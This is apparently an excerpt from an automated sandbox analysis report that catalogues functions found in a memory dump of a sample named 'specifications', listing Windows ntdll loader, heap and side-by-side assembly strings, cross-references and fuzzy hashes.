                                                                                                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-2160512332
                                                                                                                                                                                  • Opcode ID: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
                                                                                                                                                                                  • Instruction ID: c77e0dfccfafb32eb9b63c236c0e26d5960a31b87dd57a11026ca82eafeca47e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 17df6db8d0fe3216280e819ce5e96fc152c37532b864cb1495cae378475d0124
                                                                                                                                                                                  • Instruction Fuzzy Hash: A5929371A047429FE72ADF14C884FABB7E8BB84754F04492DFA95D7290D7B0D844CB92
                                                                                                                                                                                  Function 010B8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Thread identifier, xrefs: 010F553A
                                                                                                                                                                                  • corrupted critical section, xrefs: 010F54C2
                                                                                                                                                                                  • Critical section address., xrefs: 010F5502
                                                                                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F540A, 010F5496, 010F5519
                                                                                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 010F5543
                                                                                                                                                                                  • Address of the debug info found in the active list., xrefs: 010F54AE, 010F54FA
                                                                                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F54CE
                                                                                                                                                                                  • Critical section address, xrefs: 010F5425, 010F54BC, 010F5534
                                                                                                                                                                                  • Critical section debug info address, xrefs: 010F541F, 010F552E
                                                                                                                                                                                  • Invalid debug info address of this critical section, xrefs: 010F54B6
                                                                                                                                                                                  • 8, xrefs: 010F52E3
                                                                                                                                                                                  • double initialized or corrupted critical section, xrefs: 010F5508
                                                                                                                                                                                  • undeleted critical section in freed memory, xrefs: 010F542B
                                                                                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F54E2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                  • API String ID: 0-2368682639
                                                                                                                                                                                  • Opcode ID: 64133d5afe229f58a90e4bce5767fc890f7927b12f22d10389645a74c0dc036d
                                                                                                                                                                                  • Instruction ID: ab1b0996d6724857b89d7bfc08a15ecd0b5f4564edc1e0f1835f2d6a5c31ecfe
                                                                                                                                                                                  • Opcode Fuzzy Hash: 64133d5afe229f58a90e4bce5767fc890f7927b12f22d10389645a74c0dc036d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 80818AB1A00358EFDB64CF99CC45BAEBBF9AB08B04F10815EF684BB650D771A940CB50
                                                                                                                                                                                  Function 010B29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010F22E4
                                                                                                                                                                                  • @, xrefs: 010F259B
                                                                                                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 010F2602
                                                                                                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 010F261F
                                                                                                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 010F2498
                                                                                                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010F25EB
                                                                                                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 010F2624
                                                                                                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010F24C0
                                                                                                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 010F2506
                                                                                                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 010F2412
                                                                                                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 010F2409
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                  • API String ID: 0-4009184096
                                                                                                                                                                                  • Opcode ID: 4c7930b21970797df01ed444c718ffc4aa3a733924bff07c8626ce9138ef1404
                                                                                                                                                                                  • Instruction ID: bf04e3af72d7e40cbe986e231bd80f79371a469778304ce23eb9eea230c7f162
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c7930b21970797df01ed444c718ffc4aa3a733924bff07c8626ce9138ef1404
                                                                                                                                                                                  • Instruction Fuzzy Hash: 83026EF1D002299BDB71DB54CC81BDEB7B8AB54704F4041EAA789A7241EB70AE84CF59
                                                                                                                                                                                  Function 01128B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                  • API String ID: 0-2515994595
                                                                                                                                                                                  • Opcode ID: 3f2d02a8a7f78a3348f7e5a0dcb104897523417290934ebb92bf4825da69d60e
                                                                                                                                                                                  • Instruction ID: 3b3ae56b2171c6d05dc4b54410748bdcfcfaa77937d406f97149fda41c655773
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f2d02a8a7f78a3348f7e5a0dcb104897523417290934ebb92bf4825da69d60e
                                                                                                                                                                                  • Instruction Fuzzy Hash: E351CD715083269BC32DDF18C884BEBBBE8FF94650F54492DE999C7241E770D628CB92
                                                                                                                                                                                  Function 01130274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                  • API String ID: 0-1700792311
                                                                                                                                                                                  • Opcode ID: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
                                                                                                                                                                                  • Instruction ID: 494d5db2ffc24d4e2d7a81991c1df92dd9c0bb7714e893555f7f091897574f1f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 426673d73ff164796f010bbbf9cd45749e94c55794032508f11b24c8e2d93e65
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6ED1EF31A00686DFDB2ADF68C840AAEFBF1FF8A710F198059F4959B656C7349981CB14
                                                                                                                                                                                  Function 011089B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • HandleTraces, xrefs: 01108C8F
                                                                                                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01108B8F
                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01108A67
                                                                                                                                                                                  • VerifierFlags, xrefs: 01108C50
                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01108A3D
                                                                                                                                                                                  • VerifierDebug, xrefs: 01108CA5
                                                                                                                                                                                  • VerifierDlls, xrefs: 01108CBD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                  • API String ID: 0-3223716464
                                                                                                                                                                                  • Opcode ID: 976c5eccae678c5c534eb751519d1a7e8e265aa6ee8eaa25ca253b6549a03e81
                                                                                                                                                                                  • Instruction ID: c0392e375d879ddb10ba7c11b5f38d988397c61c1101779f7456da48fa395622
                                                                                                                                                                                  • Opcode Fuzzy Hash: 976c5eccae678c5c534eb751519d1a7e8e265aa6ee8eaa25ca253b6549a03e81
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E915771E08716EFD72FEF288880B9A7BB5AB54714F054528FA85AB3C1C7B09C41CB91
                                                                                                                                                                                  Function 0108EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                  • API String ID: 0-1109411897
                                                                                                                                                                                  • Opcode ID: 4ee58d7c493940c46bdbba0c34cff8eb5f35e55cd2b8af5bbe99cfc9c90ca3e8
                                                                                                                                                                                  • Instruction ID: 685195467688fafe1d2c6cfe56e4c693bb71a8d3b774814fb51a606a53d52691
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ee58d7c493940c46bdbba0c34cff8eb5f35e55cd2b8af5bbe99cfc9c90ca3e8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15A23A74A0962A8FDB64EF29C8887ADBBF5BF45304F1442E9D589E7250DB309E85CF40
                                                                                                                                                                                  Function 010B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                                                  • Opcode ID: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
                                                                                                                                                                                  • Instruction ID: feb53cec4fa3473b9beca9dadda0cf3fdb00662887f157bc39afcd49c63d61ef
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18c8afd99b66da78cf2f6ae515f63706ff27f782dbb93bec4c67e1d16df85dcf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 77912830A017159BEB69DF18D885BEE7BB5BF40B14F04017CEA90AB781DB799841CB91
                                                                                                                                                                                  Function 0107645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 010D9A2A
                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010D99ED
                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 010D99F4, 010D9A07, 010D9A30
                                                                                                                                                                                  • apphelp.dll, xrefs: 01076496
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010D9A11, 010D9A3A
                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 010D9A01
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                                                  • Opcode ID: 88f183e37b51d0bc30b37711181714b6b4dec3dc66bdcba323df5065a2a3b0fc
                                                                                                                                                                                  • Instruction ID: 23270b7a567e93ae0e984c4b7beaff2064026ab67ca7a64a1550692b627b8d19
                                                                                                                                                                                  • Opcode Fuzzy Hash: 88f183e37b51d0bc30b37711181714b6b4dec3dc66bdcba323df5065a2a3b0fc
                                                                                                                                                                                  • Instruction Fuzzy Hash: FD51C0716187059FE724DF28C881AABB7E8FB84748F00092DF5D69B260D731E944DB97
                                                                                                                                                                                  Function 010B2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 010F2160, 010F219A, 010F21BA
                                                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 010F219F
                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 010F2165
                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010F21BF
                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 010F2180
                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 010F2178
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                                                  • Opcode ID: 8dbc8eacefdbafde9533e858d3403eba493bb3d35263c450e4ffd9fc2e855960
                                                                                                                                                                                  • Instruction ID: 1d20e0fcd63e00a5ed1b6682c14856d2f648c1ca5fb5e20027c48f66762603f2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dbc8eacefdbafde9533e858d3403eba493bb3d35263c450e4ffd9fc2e855960
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8831FB36F802157BE7218A998C86F9F7BB8FBA5A94F05005DBB847B140D370EE01C7A5
                                                                                                                                                                                  Function 010BC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 010F81E5
                                                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 010F8177, 010F81EB
                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 010F8181, 010F81F5
                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 010BC6C4
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010BC6C3
                                                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 010F8170
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                  • API String ID: 0-475462383
                                                                                                                                                                                  • Opcode ID: 23063fa9e6faa401a7df16d4f202787e20e0b4581e69e26d604593878503eb4a
                                                                                                                                                                                  • Instruction ID: a5ee5457e4637c61dc0809d0f2c79e0753dfec11a3ddc97209a491273c6c5cbe
                                                                                                                                                                                  • Opcode Fuzzy Hash: 23063fa9e6faa401a7df16d4f202787e20e0b4581e69e26d604593878503eb4a
                                                                                                                                                                                  • Instruction Fuzzy Hash: B031E4717447069BD324EF68DD86E9A77E8BF94B10F04456CF9C5AB291E720EC04CBA2
                                                                                                                                                                                  Function 010C096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 010C2DF0: LdrInitializeThunk.NTDLL ref: 010C2DFA
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0BA3
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0BB6
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0D60
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0D74
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1404860816-0
                                                                                                                                                                                  • Opcode ID: 4ba7e4f3859c8427b081a782587845d5bc91a10e0ec90700ee17fdc07f59dc33
                                                                                                                                                                                  • Instruction ID: 8bcdc3419e843ccd7991985c212645fb736dad04248e38bfc40368a80b6e7124
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ba7e4f3859c8427b081a782587845d5bc91a10e0ec90700ee17fdc07f59dc33
                                                                                                                                                                                  • Instruction Fuzzy Hash: C9426B75900705DFDB61CF68C881BAAB7F4BF04704F1485ADEA89EB645D770AA84CF60
                                                                                                                                                                                  Function 0108A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                                                  • Opcode ID: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
                                                                                                                                                                                  • Instruction ID: 9c4ba23efa58783345d96fea5747c7d8285d7fd0b62eb01fe1b139ab15d6f5c0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a912aa666d695dbbef3d5b9025027ef24edd83f5996f97e2c45de1979c26242
                                                                                                                                                                                  • Instruction Fuzzy Hash: 90C18B7460C386CFDB11EF59C044B6AB7E4BF88704F04496AF9D58BA51E738CA49CB62
                                                                                                                                                                                  Function 010B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010B855E
                                                                                                                                                                                  • @, xrefs: 010B8591
                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 010B8422
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010B8421
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                                                  • Opcode ID: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
                                                                                                                                                                                  • Instruction ID: 0e1f4432399fd8543f0e8134e25d0c5234c34b6bae10d295d7fa74ed5bc16e5a
                                                                                                                                                                                  • Opcode Fuzzy Hash: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04918871508345AFD761EB25CC81FAFBAECBB88744F40492EFAC496161E734D9448B62
                                                                                                                                                                                  Function 010B273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010F21D9, 010F22B1
                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010F22B6
                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 010F21DE
                                                                                                                                                                                  • .Local, xrefs: 010B28D8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                  • API String ID: 0-1239276146
                                                                                                                                                                                  • Opcode ID: afbc0aa22bcff98bc35f1b199bfb4c42ad3a9204bec6069d9500acc6e5943386
                                                                                                                                                                                  • Instruction ID: ccac4d5ab8554cabd6301f7aff8b44a1e6559c0934b3bd61e6ad89b28b591f00
                                                                                                                                                                                  • Opcode Fuzzy Hash: afbc0aa22bcff98bc35f1b199bfb4c42ad3a9204bec6069d9500acc6e5943386
                                                                                                                                                                                  • Instruction Fuzzy Hash: FDA1BF3590022A9BDB65CF68C8C4BE9B7B0BF58354F1541EAD988AB251D730EE81CF94
                                                                                                                                                                                  Function 010864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010E10AE
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 010E0FE5
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 010E1028
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 010E106B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                  • API String ID: 0-1468400865
                                                                                                                                                                                  • Opcode ID: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
                                                                                                                                                                                  • Instruction ID: c379ca71bd00ea4648c99ff449b635a176e1b912d1bc208ae837d59533b6eb90
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5971BFB19083059FCB61EF14C885B9B7FE8AF54764F400469F9C88B286D775D588CBE2
                                                                                                                                                                                  Function 010A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
